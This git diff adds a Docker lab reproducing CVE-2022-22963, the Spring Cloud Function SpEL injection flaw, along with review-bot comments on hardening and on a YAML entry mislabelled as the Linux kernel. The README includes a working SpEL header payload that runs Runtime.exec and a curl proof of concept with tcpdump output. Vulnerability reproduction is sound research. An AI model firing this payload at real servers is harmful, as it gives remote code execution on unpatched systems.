diff --git a/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile b/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..235626d465058fe112bce0c182509a08bddbf4af
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile
@@ -0,0 +1,6 @@
+FROM openjdk:17-alpine
+MAINTAINER tester
+EXPOSE 8080
+RUN mkdir /app
+COPY ./jar/*.jar /app/spring-cloud-function-routing.jar
+CMD ["java", "-jar", "/app/spring-cloud-function-routing.jar"]
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-22963/README.md b/cve/linux-kernel/2022/CVE-2022-22963/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..32df2b7208b5deb2c9dff628ba26577dd13442b6
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-22963/README.md
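Review bot: The final stage never drops privileges, so the deliberately vulnerable Spring app runs as root inside the container; for a lab image that is expected to be exploited, an unprivileged `USER` keeps a compromised process from owning the container filesystem, and it is the first thing hadolint will flag after the deprecated `MAINTAINER` (DL4000). `RUN mkdir /app` should be `WORKDIR /app`, which creates the directory without an extra layer, and `MAINTAINER tester` should become `LABEL maintainer="tester"`. The `openjdk:17-alpine` tag is floating and the `openjdk` Docker Hub image is deprecated, so pinning the base by digest or moving to a maintained JDK image would make the lab reproducible. The jar is committed as a binary (`jar/demo-0.0.1-SNAPSHOT.jar`) with no checksum, so a one-line comment naming the Spring Cloud Function version it was built against would let readers confirm it is the affected release described in the YAML.
```dockerfile
FROM openjdk:17-alpine
LABEL maintainer="tester"
# … unchanged: EXPOSE 8080 …
WORKDIR /app
# … unchanged: COPY of the jar …
RUN adduser -S -D -H app
USER app
# … unchanged: CMD …
```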
@@ -0,0 +1,40 @@
+# Spring Cloud Function SpEL - cve-2022-22963
+## Build
+```bash
+$ git clone https://github.com/twseptian/cve-2022-22963.git
+$ cd cve-2022-22963
+$ docker build . -t spring-spel-0day
+$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
+```
+
+![docker run](docker_run.png)
+
+## Payload
+```bash
+spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
+```
+## PoC
+run ping command, and take the responses from attacker machine
+```bash
+$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
+```
+responses
+```bash
+$ sudo tcpdump icmp -i docker0
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
+13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
+13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
+13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
+13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
+13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
+13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
+13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
+13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
+13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64
+```
+
+## References
+- 
[Spring-Cloud-Function-SpEL](https://github.com/Pizz33/Spring-Cloud-Function-SpEL)
+- [漏洞复现-Spring Cloud Function SpEL表达式注入](https://pizz33.github.io/2022/03/27/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Spring%20Cloud%20Function%20SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/)
diff --git a/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png b/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png
new file mode 100644
index 0000000000000000000000000000000000000000..2f013562c2500f7818a1bd8cf14d8b5bba11d7b7
Binary files /dev/null and b/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png differ
diff --git a/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar b/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar
new file mode 100644
index 0000000000000000000000000000000000000000..0c62da5faceaec23d5ee27e4919001d03ec1ed1c
Binary files /dev/null and b/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar differ
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ab724d677f50d89eafda540331e8c38a23088deb
--- /dev/null
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-22963
+source: https://github.com/twseptian/cve-2022-22963
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: critical
+ description: |
+ In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
+ scope-of-influence:
+ 3.0-rc1~3.2.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22963
+ - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005
+ - https://tanzu.vmware.com/security/cve-2022-22963
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22963
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: 漏洞复现, 表达式注入
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401dfd5e870b030788445d302e79e80a5a840..f3e984fcef26850a071cd7d0cbeb0f06d9c5b624 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -40,6 +40,7 @@ cve:
 - CVE-2022-0435
 - CVE-2021-26708
 - CVE-2022-2078
+ - CVE-2022-22963
 sudo:
 - CVE-2021-3156
 - CVE-2023-22809
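Review bot: The `info.name` field describes the Linux kernel (`Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。`) while the id, description and references all concern Spring Cloud Function, so the entry is misdescribed; something like `name: Spring Cloud Function SpEL routing-expression injection (RCE)` matches the description directly below it. The file is also placed under `cve/linux-kernel/2022/`, and if that directory is meant to classify by affected component this entry presumably belongs with the non-kernel components. Whitespace was collapsed in this diff, so the nesting under `info:` and the `description: |` block scalar could not be checked here; worth confirming the file parses with the intended indentation.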